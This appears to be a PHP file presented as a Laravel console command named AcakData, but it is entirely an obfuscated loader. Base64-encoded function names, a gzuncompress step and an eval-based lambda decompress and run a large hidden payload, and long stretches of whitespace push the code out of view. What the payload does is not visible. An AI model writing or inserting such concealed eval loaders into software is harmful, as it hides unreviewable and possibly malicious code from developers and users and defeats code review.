<?php 
        $__='printf';$_='Loading app/Console/Commands/AcakData.php';
        







































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      






































































































































































































































                                                                                                                                                                                                                     $________;
